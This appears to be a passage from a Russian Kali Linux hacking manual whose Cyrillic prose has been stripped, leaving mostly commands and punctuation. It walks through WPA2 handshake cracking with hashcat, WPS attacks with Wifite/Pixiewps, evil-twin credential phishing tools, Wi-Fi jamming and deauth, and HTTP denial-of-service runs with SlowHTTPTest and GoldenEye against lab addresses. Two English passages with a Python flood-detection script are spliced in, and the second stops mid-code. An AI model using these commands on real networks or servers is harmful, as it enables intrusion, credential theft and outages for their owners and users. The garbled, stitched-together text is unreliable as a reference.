1| aircrack-ng hs/out.cap -J hs/out

WPA2 WPA Hashcat


Hashcat (cudaHashcat oclHashcat) .
:



- , Rockyou.
, / ..
, WPA2
WPA. MD5, phpBB,
MySQL SHA1 Hashcat Kali Linux. :
1| hashcat --help | grep WPA
.. 2500.

:
1| hashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
. , :
1| oclHashcat --force -m 2500 /root/hs/out.hccap /root/rockyou.txt
oclHashcat.
, cudaHashcat, :
1| cudaHashcat -m 2500 /root/hs/out.hccap /root/rockyou.txt
, .
. ,
.
, , Pyrit -
cudaHashcat oclHashcat Hashcat.
, . ,
MD5, phpBB, MySQL SHA1 Hashcat Kali
Linux .


.
.
WPA WPA2 Hashcat (cudaHashcat oclHashcat)
:
1| hashcat -m 2500 -a 3 capture.hccap ?d?d?d?d?d?d?d?d

-m = 2500 WPA2 WPA.


-a = 3 ( ).
capture.hccap = .cap.
wpaclean aircrack-ng.
?d?d?d?d?d?d?d?d = , d = . ,
, , 78964352 12345678 ..
, .
, .
,
. , webware-1.hcmask.
.
/usr/share/oclhashcat/masks/webware-1.hcmask.
, , oclHashcat
:
1| ls /usr/share/oclhashcat/masks/

,
:
1| cudahashcat -m 2500 -a 3 /root/hs/out.hccap /usr/share/oclhashcat/masks/webware-1.hcmask

.hcmask file
.hcmask :
1| tail -10 /usr/share/oclhashcat/masks/8char-1l-1u-1d-1s-compliant.hcmask
Hashcat (cudaHashcat
oclHashcat) .

Hashcat (cudaHashcat oclHashcat) .
, Hashcat.
, . . /root
1| cat hashcat.pot

. ,
hashcat.net, .
.
, :
, , , ,
, .
( ),
WebWare.biz. ,
!

23. Wifite Pixiewps


- ,
19. Kali Linux USB Wi-Fi

Pixiewps. :
1. pixie dust attack
2. Pixiewps Wiire
3. Pixiewps Reaver (t6x)
4. Reaver (t6x) Pixiewps Pixiewps
Kali Linux
5. Wifite Pixiewps

, Pixiewps,
.
, Wifite Pixiewps
Kali Linux. ,
. .
https://github.com/aanarchyy/wifite-mod-pixiewps
, (wifite-ng),
.
(, Kali Linux SSH, ,
.
. ,
:
1| wget --output-document=/usr/bin/wifite-ng https://raw.githubusercontent.com/aanarchyy/wifite-mod-pixiewps/master/wifite-ng
:
1| chmod +x /usr/bin/wifite-ng
!
:
1| wifite-ng


1| -pto <sec> pixiewps, 660
2| -ponly pixiewps M3
3| -pnopsk reaver
4| -paddto <sec> n ,
30
5| -update wifite
6| -endless ,


Kali Linux. Kali .
Pixiewps Wiire

reaver-wps-fork-t6x t6x


pixiewps, reaver,
.
.


.
(
).
(, , ,
. .).

,
pixiewps
reaver github
mdk3
.

24. Wi-Fi : ,
Kali Linux
- ,
19. Kali Linux USB Wi-Fi

Kali Linux ,
, . Kali
,
.
, ,
. ,
.
.
(Wi-Fi). ,
.
,
. .
, . . .
Kali?,
: .
:
;
;
;
()
;
/ /
,
.
( ) ,
,
. ,
. , ,
.
,
.
:
1| cd ~
2| mkdir opt

wifiphisher
: https://github.com/sophron/wifiphisher
Wifiphisher WiFi
.
. ..
.
WPA/WPA2.
Wifiphisher Kali Linux MIT .
, :
1. . Wifiphisher
wifi
(deauth)
, .
2. . Wifiphisher
.
, .
NAT/DHCP . , -
.
--.
3.
. wifiphisher -
HTTP & HTTPS .
, wifiphisher ,
, , , ,
WPA .

wifiphisher
, .
hostapd, , , :
1| apt-get install hostapd

wifiphisher
1| cd ~/opt
2| git clone https://github.com/sophron/wifiphisher
3| cd wifiphisher/
:
1| python wifiphisher.py

wifiphisher
,
,
waidps. .

waidps
: https://github.com/SYWorks/waidps
waidps , .

.
.
.
.
, waidps
. .
WAIDPS , Python
Linux. , Kali,
/ . .. Kali
Linux .
, ( )
, ( WEP/WPA/WPS)
( ). ,
WiFi .
:
MAC SSID
.
WAIDS , ,
,
. .
, , .
WAIDS (
, WIDS):
Association / Authentication flooding
,
WPA
WEP ARP

WEP chopchop
WPS Reaver,
Bully ..
- (Evil-Twin)

waidps
1| cd ~/opt
2| git clone https://github.com/SYWorks/waidps
3| cd waidps
4| python waidps.py

Chopchop:

Chopchop :

Chopchop :

3vilTwinAttacker
: https://github.com/P0cL4bs/3vilTwinAttacker
Wi-Fi,
, .
:
Kali linux.
Ettercap.
Sslstrip.
Airbase-ng aircrack-ng.
DHCP.
Nmap.
3vilTwinAttacker
1| cd ~/opt
2| git clone https://github.com/P0cL4bs/3vilTwinAttacker
3| cd 3vilTwinAttacker
4| chmod +x install.sh

5| ./install.sh --install
:
1| python 3vilTwin-Attacker.py
( Kali Linux):
1| python /usr/share/3vilTwinAttacker/3vilTwin-Attacker.py
[ DHCP Debian ]
Ubuntu:
1| $ sudo apt-get install isc-dhcp-server
Kali linux:
1| apt-get install isc-dhcp-server
[ DHCP redhat ]
Fedora:
1| $ sudo yum install dhcp

linset
: https://github.com/vk496/linset
linset " " (Evil Twin Attack).

linset
.
Kali Linux ( ).
. :
1| apt-get install isc-dhcp-server lighttpd macchanger php5-cgi macchanger-gtk

. linset , ,
.
:
1| cd ~/opt
2| git clone https://github.com/vk496/linset
3| cd linset
4| chmod +x linset
5| ./linset

linset


( )
-
,
DHCP
DNS
-
,
, , -

,

25. Router Scan by StasM Kali Linux (


Wi-Fi )
, Router Scan Stas'M !
.
:
, , -
(, .)


,
, . , , -,
Wi-Fi, . .
, , ,
. .
,
Linux. .

,
- Linux. , . .
. : nmap (
) + curl ( ) + grep
( ( )
/
).

,
1000 Wi-Fi. :
PHP, ,
. ..

.
, . ,
, , .
, .
, , ( nmap,
PHP) ,
. ,
Stas'M,
curl.

Router Scan Stas'M. !


, Wi-Fi
.
Windows, , ,
.
Linux Router Scan Stas'M
Wine. Kali Linux.

Wine Kali Linux


, Kali 2.0, " Wine Kali Linux
2.0".
Wine Kali Linux, ,
. , , -
, .
:
1| dpkg --add-architecture i386
2| apt-get update
3| apt-get install wine-bin:i386

Router Scan Stas M (http://stascorp.com/load/1-1-0-56),


( ), RouterScan.exe,
Wine,
Windows.
Router Scan Stas'M Linux (
):

- :
Wi-Fi -
;
Wi-Fi ( ),
IP , , IP - .
,
IP, IP .
- IP ipgeobase.ru,
:
1| curl -s 'URL' | grep -o -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3} - [0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' > diap_ip.txt
'URL' ipgeobase.ru, .

26. Wifi_Jammer Wifi_DoS WebSploit


Wifi_Jammer ( )
Wifi_Jammer
Wifi_DoS WebSploit,
, . , WebWare.biz,
, , ,
aircrack-ng.
:
1| set mon wlan0mon

, :

,
wlan .
Wifi_Jammer, Wifi_DoS.
, ,
( ):
1| cat /usr/share/websploit/modules/wifi_jammer.py > /usr/share/websploit/modules/wifi_jammer.py.bak
/usr/share/websploit/modules/wifi_jammer.py
1| vim /usr/share/websploit/modules/wifi_jammer.py
:
1| elif com[0:7] =='set mon':
2| options[3] = com[8:12]
( ,
):
1| elif com[0:7] =='set mon':
2| options[3] = com[8:]

WebSploit Wifi_Jammer.
, set mon wlan0mon.

Wifi_DoS (
)
Wifi_DoS .
:
1| Traceback (most recent call last):
2| File "/usr/bin/websploit", line 160, in <module>
3| start()
4| File "/usr/bin/websploit", line 158, in start
5| main()
6| File "/usr/bin/websploit", line 132, in main
7| main()

8| File "/usr/bin/websploit", line 122, in main


9| wifi_dos.wifi_dos()
10| File "/usr/share/websploit/modules/wifi_dos.py", line 31, in wifi_dos
11| wifi_dos()
12| File "/usr/share/websploit/modules/wifi_dos.py", line 27, in wifi_dos
13| wifi_dos()
14| File "/usr/share/websploit/modules/wifi_dos.py", line 39, in wifi_dos
15| wifi_dos()
16| File "/usr/share/websploit/modules/wifi_dos.py", line 76, in wifi_dos
17| os.chdir("temp")
18| OSError: [Errno 2] No such file or directory: 'temp'

Wifi_Jammer. ..
, , . Wifi_DoS.
1| mkdir /root/temp && touch /root/temp/blacklist
, Wifi_DoS.
WebSploit :
1| cd ~ && websploit
, ,
:
1| cat /usr/share/websploit/modules/wifi_dos.py > /usr/share/websploit/modules/wifi_dos.py.bak
/usr/share/websploit/modules/wifi_dos.py
1| vim /usr/share/websploit/modules/wifi_dos.py
:
1| elif com[0:7] =='set mon':
2| options[3] = com[8:12]
:
1| elif com[0:7] =='set mon':
2| options[3] = com[8:]
:
1| elif com[0:3] =='run':
2| cmd_0 = "airmon-ng stop " + options[3]
:
1| elif com[0:3] =='run':
2| cmd_0 = "airmon-ng stop " + options[0]
.
27. - Wifi_Jammer:
Wi-Fi
- ,
19. Kali Linux USB Wi-Fi

Wi-Fi
( )
(Wi-Fi): , ,
WPS . ,
? , , ,
DoS Wi-Fi. ,
.
Wi-Fi, -
,
.

Wifi_Jammer
Aircrack-ng .
, Wifi_Jammer .
. 26. Wifi_Jammer Wifi_DoS
WebSploit. Wifi_Jammer,
.
:
1| airmon-ng

: airmon-ng start _. :
1| airmon-ng start wlan0

, ( ):
1| Found 2 processes that could cause trouble.
2| If airodump-ng, aireplay-ng or airtun-ng stops working after
3| a short period of time, you may want to kill (some of) them!
4| PID Name
5| 3036 NetworkManager
6| 3187 dhclient

,
airodump-ng, aireplay-ng airtun-ng
, . (
PID):
1| kill 3036
2| kill 3187

:
1| airodump-ng wlan0mon

.
WebSploit
1| websploit
wifi_jammer:
1| wsf > use wifi/wifi_jammer

wifi_jammer,
, . ,
.
:
1| wsf:Wifi_Jammer > show options
essid, bssid, channel mon.
airodump-ng.
1| wsf:Wifi_Jammer > set essid Mial
2| wsf:Wifi_Jammer > set bssid 20:25:64:16:58:8C
3| wsf:Wifi_Jammer > set channel 11
:
1| wsf:Wifi_Jammer > set mon wlan0mon
, ,
wlan0mon.
run:
1| wsf:Wifi_Jammer > run
. ,
Wi-Fi.
airodump-ng wlan0mon.
PWR. 40.
PWR 0
. Wi-Fi .

, ,
, .

Wi-Fi
, ,
. ,
.
,
.
.
, . .
.
.
.
.

28. - Wifi_DoS:
Wi-Fi
- ,
19. Kali Linux USB Wi-Fi
Wifi_DoS Wifi_Jammer,
(- Wifi_Jammer: Wi-Fi).
, , . ,
- , ,
.
DoS-
Wi-Fi .
, .

.

Wifi_DoS
Wifi_DoS,
-? , - ,
. ,
. Wifi_Jammer Wifi_DoS
WebSploit, .

, DoS- .
1| airmon-ng
2| airmon-ng start wlan0

:
1| airodump-ng wlan0mon

WebSploit :
1| cd ~ && websploit

wifi_dos:
1| use wifi/wifi_dos

:
1| wsf:Wifi_Dos > set essid Mial
2| wsf:Wifi_Dos > set bssid 20:25:64:16:58:8C
3| wsf:Wifi_Dos > set channel 11

, :
1| wsf:Wifi_Dos > set interface wlan0
2| wsf:Wifi_Jammer > set mon wlan0mon

. interface wlan0 - ,
airmon-ng. mon wlan0mon .

.., , :

:
1| wsf:Wifi_Jammer > run
DoS Wi-Fi , :

4. -
29. - (DoS -) SlowHTTPTest Kali
Linux: slowloris, slow body slow read

- ,
, () .
, mod_evasive
DoS .
-:
- Apache mod_security mod_evasive
CentOS
DoS:
- Low Orbit Ion Cannon (LOIC)
- (DoS -) SlowHTTPTest Kali Linux: slowloris, slow body
slow read ( )
SlowHTTPTest ,
(DoS) .
Linux, OSX Cygwin (Unix-
Microsoft Windows).
DoS
, Slowloris, slow body, Slow Read (
TCP), ,
Apache Range Header,
.
Slowloris Slow HTTP POST DoS , HTTP, ,
,
. HTTP ,

, .
, .
HTTP,
HTTP .
Slow Read , slowloris slow body,
, HTTP ,
.

SlowHTTPTest
Kali Linux
Kali Linux apt-get .. ( !)
1| apt-get install slowhttptest

Linux
, . .
, , , .
:
SlowHTTPTest, :
1| (t=`curl -s https://code.google.com/p/slowhttptest/downloads/list | grep -E -o '//slowhttptest.googlecode.com/files/slowhttptest(.)*.tar.gz" onclick="' | sed 's/\/\///' | sed 's/" onclick="//' | head -1`; curl -s $t -o slowhttptest-last.tar.gz) && tar -xzvf slowhttptest-last.tar.gz && cd slowhttptest-*
.. , .
, , .
1| $ tar -xzvf slowhttptest-x.x.tar.gz
2| $ cd slowhttptest-x.x
3| $ ./configure --prefix=PREFIX
4| $ make
5| $ sudo make install
PREFIX , slowhttptest
.
libssl-dev .
.
Mac OS X
Homebrew:
1| brew update && brew install slowhttptest

Linux
, slowhttptest
( Kali Linux).
SlowHTTPTest
slowhttptest , .
.
slow body a.k.a R-U-Dead-Yet,
:
1| slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.37/info.php -x 10 -p 3
, :
1| slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.37/info.php -x 10 -p 3

, ,
. , .
,
, .

slow headers a.k.a. Slowloris:


1| slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u http://192.168.1.37/info.php -x 24 -p 3
, :
1| slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u http://192.168.1.37/info.php -x 24 -p 3
: :

Slow Read .
x.x.x.x:8080 , - IP
:
1| slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://192.168.1.37/info.php -p 5 -l 350 -e x.x.x.x:8080
:

SlowHTTPTest
,
5 ,
( 1), ( 4).
-g CSV, HTML,
Google Chart.

,

.
CSV
, MS Excel, iWork Numbers Google Docs.
, ,
, :
Hit test time limit ,
-l
No open connections left
Cannot establish connection N
, N -i, 10 ( ).
.

Connection refused (
? )
Cancelled by user Ctrl-C SIGINT -

Unexpected error .
SlowHTTPTest
, .
,
. .

, http://192.168.1.37 1000 .
1| slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://192.168.1.37/info.php -x 10 -p 3

-
1| root@WebWare-Debian:~# netstat | grep http | wc -l
2| 111

, . . SSH
. http 111 10
.
(
VPS).
DoS
DoS , ,
,
( ),
DoS , ,
SlowHTTPTest
.
, ,
-
, . ,
DoS IP () .
. ,
-
.

Windows, Linux Mac. DoS


, GoldenEye, hping3 -,
. DoS (,
- ). ,
, -,
.

30. - : DoS - Kali Linux GoldenEye


WebWare.biz
DoS, HTTP, -
. GoldenEye , ,
30 , ,

. ,
WAF, IDS.
- .
iptables/
.
GoldenEye:
: GoldenEye
: Jan Seidl
-: http://wroot.org/
GoldenEye:
1.
.
2. GoldenEye
!
3. GoldenEye HTTP DoS.
4. : HTTP Keep Alive + NoCache
DoS DDoS
DoS . DDoS.
DoS DDoS :
1. DoS DDoS
2. DoS DDoS
3. DoS DDoS
DoS DDoS
DoS DDoS , Windows,
Apache, OpenBSD
.
DoS DDoS
DoS DDoS .
Synflood, Ping of Death .
DoS DDoS
ICMP-, UDP- ,
.
DoS DDoS . ,
DoS . ( )
DDoS . , ,
, . . /.

GoldenEye
, , ~/opt.
, :
1| mkdir opt
2| cd opt

,
GoldenEye, GoldenEye (
):
1| mkdir GoldenEye && cd GoldenEye && wget https://github.com/jseidl/GoldenEye/archive/master.zip && unzip master.zip && cd GoldenEye-master/ && ./goldeneye.py

, .
GoldenEye, :
1| root@WebWare-Kali:~/opt# mkdir GoldenEye
2| root@WebWare-Kali:~/opt# cd GoldenEye
3| root@WebWare-Kali:~/opt/GoldenEye# wget https://github.com/jseidl/GoldenEye/archive/master.zip

master.zip.
1| unzip master.zip

GoldenEye-master,
:
1| ls
2| cd GoldenEye-master/
3| ls

GoldenEye -
, :
1| ./goldeneye.py
:


.
.
: ( )
. ,
.
.
,
.
:
1| root@WebWare-Kali:~/opt/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/
()
1| sudo ./goldeneye.py http://www.goldeneyetestsite.com/
()
1| python goldeneye.py http://www.goldeneyetestsite.com/
, , .

GoldenEye:
top:

.. , ,
350 .

1| ./goldeneye.py http://192.168.1.37/info.php

, - ,
,
.

, (
-, ).
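A defender-side view of what such a flood looks like in the web server's own log: in the access-log excerpt that follows, every request comes from one address within a few seconds, each with a freshly randomised query string, a fake referer and a different User-Agent, none of which a single browser produces. The following Python script is an added example, not code from the book or from GoldenEye; it parses Apache combined-format lines and flags an address whose request count inside a sliding time window, together with the number of distinct User-Agents it presents, is out of proportion for one client. The log lines embedded in it are constructed for the example (192.0.2.x documentation addresses), modelled on the excerpt.

```python
"""Flag HTTP-flood clients in an Apache combined-format access log.

Added example, not code from the book or from GoldenEye.  The sample lines are
constructed (192.0.2.x documentation addresses), modelled on the excerpt.
"""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" LogFormat: host ident user [time] "request" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

UA_MAC = "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_4) AppleWebKit/536.12 (KHTML, like Gecko) Chrome/10.0.623.89 Safari/536.26"
UA_WIN = "Mozilla/5.0 (Windows NT 5.1; WOW64) Gecko/20021304 Firefox/12.0"
UA_LNX = "Mozilla/5.0 (Linux x86_64; X11) Gecko/20010905 Firefox/17.0"
UA_MSIE = "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 11_6_2)"

SAMPLE_LOG = [
    # Ordinary visitor: two page views fifty seconds apart, one browser.
    '192.0.2.10 - - [18/Jun/2015:17:06:40 +0700] "GET /index.php HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Firefox/38.0"',
    '192.0.2.10 - - [18/Jun/2015:17:07:30 +0700] "GET /about.php HTTP/1.1" 200 2048 '
    '"http://192.0.2.1/index.php" "Mozilla/5.0 (X11; Linux x86_64) Firefox/38.0"',
    # Flood client: six hits on one URL within three seconds, random query keys,
    # fake referers and a User-Agent that changes almost every request.
    '192.0.2.55 - - [18/Jun/2015:17:06:48 +0700] "GET /info.php?dC1FyXpw=hB6Oh&rjcf74A=YVA HTTP/1.1" 200 69504 '
    '"http://www.baidu.com/k1IkNXv" "%s"' % UA_MAC,
    '192.0.2.55 - - [18/Jun/2015:17:06:48 +0700] "GET /info.php?p6P23Hj=IcVg&WWml82r3D=TCY8 HTTP/1.1" 200 69504 '
    '"http://www.baidu.com/fWaBwllK" "%s"' % UA_WIN,
    '192.0.2.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?vySSDx=tG1r&CKVuvV=JLoK&nHc8x=0x5Y HTTP/1.1" 200 69504 '
    '"-" "%s"' % UA_LNX,
    '192.0.2.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?0Nk7p=kSf&1eVF8PNy=UpDt HTTP/1.1" 200 69504 '
    '"-" "%s"' % UA_MSIE,
    '192.0.2.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?SAQMIx5Pl=VWGE HTTP/1.1" 200 69504 '
    '"http://www.google.com/gCqMk2Q05" "%s"' % UA_MAC,
    '192.0.2.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?jA5Kw=fwtS&Y0fBbDfSXd=8Jm5 HTTP/1.1" 200 69504 '
    '"-" "%s"' % UA_WIN,
]


def parse_line(line: str) -> dict | None:
    """Parse one combined-format line; returns None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    # The set of query-string parameter names: a real page has a stable shape,
    # a flood tool invents new names on every request.
    query = urlsplit(rec["target"]).query
    rec["query_keys"] = frozenset(k for k, _ in parse_qsl(query, keep_blank_values=True))
    return rec


def detect_floods(lines, window_seconds=10, min_requests=20, min_user_agents=3) -> dict:
    """Return {ip: stats} for clients that exceed `min_requests` inside any
    `window_seconds` window while presenting at least `min_user_agents`
    distinct User-Agent strings."""
    by_ip: dict[str, list[dict]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    flagged: dict[str, dict] = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["time"])
        times = [r["time"] for r in recs]
        peak, j = 0, 0
        for i in range(len(times)):  # sliding window over sorted timestamps
            while j < len(times) and (times[j] - times[i]).total_seconds() <= window_seconds:
                j += 1
            peak = max(peak, j - i)
        user_agents = {r["ua"] for r in recs}
        shapes = {r["query_keys"] for r in recs}
        if peak >= min_requests and len(user_agents) >= min_user_agents:
            flagged[ip] = {"peak_requests": peak, "user_agents": len(user_agents),
                           "query_shapes": len(shapes)}
    return flagged


if __name__ == "__main__":
    for ip, stats in detect_floods(SAMPLE_LOG, window_seconds=5, min_requests=5).items():
        print(ip, stats)
```

The thresholds are deliberately parameters: on a real server the window and request count depend on the site's normal traffic, and the per-address view breaks down once the same tool is run from several hosts, which is why the text distinguishes DoS from DDoS. The distinct-query-shape count is the cheap signal that survives even when a tool reuses one User-Agent.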
GoldenEye
:
1| cat /var/log/apache2/access.log | grep -E '192.168.1.55'
grep -E '192.168.1.55',
, .
:
1| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?vySSDx=tG1rmfX4HbYXBm&CKVuvV=JLoK&nHc8x=0x5YKQtvHs0HWS68 HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_3_3) AppleWebKit/535.6 (KHTML, like Gecko) Version/6.0.5 Safari/535.17"

2| 192.168.1.55 - - [18/Jun/2015:17:06:48 +0700] "GET /info.php?dC1FyXpw=hB6Oh&rjcf74A=YVA&YUtUXuDo2s=2pLY7nlq&SjyqoF=wUIx8Aq&tXkrfJRw=LsgED HTTP/1.1" 200 69504 "http://www.baidu.com/k1IkNXv" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_4) AppleWebKit/536.12 (KHTML, like Gecko) Chrome/10.0.623.89 Safari/536.26"
3| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?0Nk7p=kSf&1eVF8PNy=UpDtxpDmJE2Fbx6&lPS=53T0AUI6Xu&5EbHY=scv1yBq8O6Y&JJthAkQqqk=HUEQBD5ONbAMxVlWHxai HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64) Gecko/20021304 Firefox/12.0"
4| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?SAQMIx5Pl=VWGEFj3q8N0 HTTP/1.1" 200 69504 "http://www.google.com/gCqMk2Q05?DxQe=67gW4HUd3iTKCu2qWSJ&ngWHMmS1=5XyoGh6q2sVlyHBdK&bl185B=anwKamnu2xK&RpI=HA0wNexUytc&uOqLV=6TNbGepqbnr&uu2fjtL63=u5lnA701na4cYYH0yN&TOY066XT=3WJQhmtXRyCo46HnbXY1" "Mozilla/5.0 (Linux x86_64; X11) Gecko/20010905 Firefox/17.0"
5| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?jA5Kw=fwtSMfaPQ8XtCaK&Y0fBbDfSXd=8Jm5hqt&xPC=1qwBHvMDy7gl HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64) Gecko/20011709 Firefox/23.0"
6| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?t2U0aYjxm=q21n4BARB1&qxI1=cTw&XjGPpG=W3AAWvebbW HTTP/1.1" 200 69504 "http://www.baidu.com/bQnoS7ULAY" "Mozilla/5.0 (Windows NT.6.2; Win64; x64) AppleWebKit/536.10 (KHTML, like Gecko) Chrome/18.0.1844.44 Safari/537.21"
7| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?nkIkop=6pivICjNb6&U3Y=dDlbGnW3feTEXCm&aH2JLMl=sGmkpeSLnTtXahs7agi&8htjBss=DFuXcUiJ5G5Fu7c HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; .NET CLR 3.0.8867; Intel Mac OS X 11_6_2)"
8| 192.168.1.55 - - [18/Jun/2015:17:06:48 +0700] "GET /info.php?p6P23Hj=IcVgaSIUoVTanmFIDan&WWml82r3D=TCY8rta5YrwVsLJmrM HTTP/1.1" 200 69504 "http://www.baidu.com/fWaBwllK?aNP85MesWv=VhL6v32qtwyj&6CLwEBed=Eb73YTA24oYXmLk2w&Uy3wv=4pvNH8y&Jvirs=RJ4hKfRa&HyIYt8gtP=CHjm8OJaOP2djoQS&rm7bH=rukJ4726B14D3XOxDwJ6&QBkOD3=33qpPxVM3ih76MaSgnT&s7gO=3WrX3Vd&Vsh=A13d" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_4_1) AppleWebKit/536.10 (KHTML, like Gecko) Chrome/15.0.1172.45 Safari/535.15"
9| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?so64O=2GhoHQaFy&DSmxwEWk=tYxV&y1C7mM=kQbuxco5oJfLPocGLl&kbItk4Rlj=LjVhrLgelmtLYDuldfF HTTP/1.1" 200 69504 "http://192.168.1.37/uxNqvi6EnN?cAyrBjvKc=OsSGuqs&rrlLD=2bKFfSyTf" "Mozilla/5.0 (Windows; U; MSIE 10.0; Windows NT 5.1; .NET CLR 2.2.16303; Win64; x64)"
10| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?EXRbe03wp=fEBV5exjikcr8oNbEkmN&vpg8wYXv=DMGpYP1RMBUglSjbv4g&55prJ
=fY78WvDU3vW7GaoW4etN&JWEFmlYFU=yFyBEk7 HTTP/1.1" 200 69504 "-" "Mozilla/5.0
(Windows; U; MSIE 8.0; Linux x86_64; .NET CLR 1.0.1395; X11)"
11| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?7xIRdP0=8mjyacN&kEd2MwYtJ=bWhJvAH3A1H&xWe7vp6nH=faGl3PGJ4xAf&dSn
j5CW=wOBRfkLbMrEWdmMFvov&xWPL3sYb=WN0yYPXu HTTP/1.1" 200 69504 "-"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_0) Gecko/20062612 Firefox/18.0"

WebWare.biz 192
Kali Linux 2.0

12| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?lVn80y605=IDRbDmoiDyNBu


HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_4) Gecko/20052008
Firefox/18.0"
13| 192.168.1.55 - - [18/Jun/2015:17:06:52 +0700] "GET
/info.php?mAthtfI=c4QdAopYyQGAsJAl0XUH HTTP/1.1" 200 69504
"http://www.yandex.com/jbOJRnhpii?fW4YmYLq=6A6f8qyxLRk6" "Mozilla/5.0 (Linux i386;
X11) AppleWebKit/536.27 (KHTML, like Gecko) Version/4.1.4 Safari/537.21"
14| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?1nwS7r=g6qpYcfOre
HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Linux i386; X11) Gecko/20053002 Firefox/15.0"
15| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?00iHfl2=CGhueehx3DqR32D&MnPMIcqiTN=HcIR&GFgFaO=IJL HTTP/1.1" 200
69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_3_3) AppleWebKit/535.29 (KHTML,
like Gecko) Chrome/19.0.1233.51 Safari/536.18"
16| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?Ml1k=DFVW0F7 HTTP/1.1"
200 69504 "-" "Mozilla/5.0 (Linux i386; X11) AppleWebKit/537.1 (KHTML, like Gecko)
Chrome/8.0.1320.86 Safari/535.21"
17| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET
/info.php?khUn=xnRp0gXjlF&bl8TpeXEF5=28W&wPkB=cnOPTgwOpPGC&12cnFT6b=XNDSX
FPdtraDsR&0FqigAn62=Kl4Y7pj2e7lj0nGoGN HTTP/1.1" 200 69504 "-" "Mozilla/5.0
(Windows NT.6.2; Win64; x64) AppleWebKit/537.3 (KHTML, like Gecko) Version/5.1.2
Safari/536.32"

( , )
, GET
, , Bing,
Baidu, Yandex .
, - ?
, URL, Referrer
200 OK. ? .

, ,
, IP ( IP
?) (Firefox, Chrome, MSIE, Safari . .),
(Mac, Linux, Windows ..)
. , URL ,
- ,
(, Apache worker/socket).
- X
IP / ,

(HTTP 503 ). ,
proxy/VPN .
IP :
root@kali:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/ -w 10 -s 10 -m random
:
-w = 10
-s = 10
-m = , GET POST
DoS!
Google Analytics GoldenEye
, , -
. , Google Analytics
( IP,
Google ,
). :
Google, . .
.
Google , -
Google.
.
/ GoldenEye
, Apache:
1. IP ( 300 IP Apache)
2. IP
3. KeepAlive Connection Timeout (
300)
4. , .
,
.
5. Web application Firewall (WAF).

6.
.
7. NGINX Node.js .

GoldenEye ( ) HTTP Flooder .


, NoCache KeepAlive GoldenEye
. ,
, .
,
- ( ), -
-, GET POST .
. WAF
.
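The log excerpt above shows the traits that give a GoldenEye run away: one source address, query-string parameter names that never repeat, a different User-Agent on nearly every request, and Referer values pointing at search engines the client never came from. The detector below is an added example written for this page, not code from GoldenEye or from the original article. It parses Apache combined-format lines (the sample lines are constructed in the style of the excerpt, not real traffic) and flags a client when several of those traits coincide inside one second.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format:
# host ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
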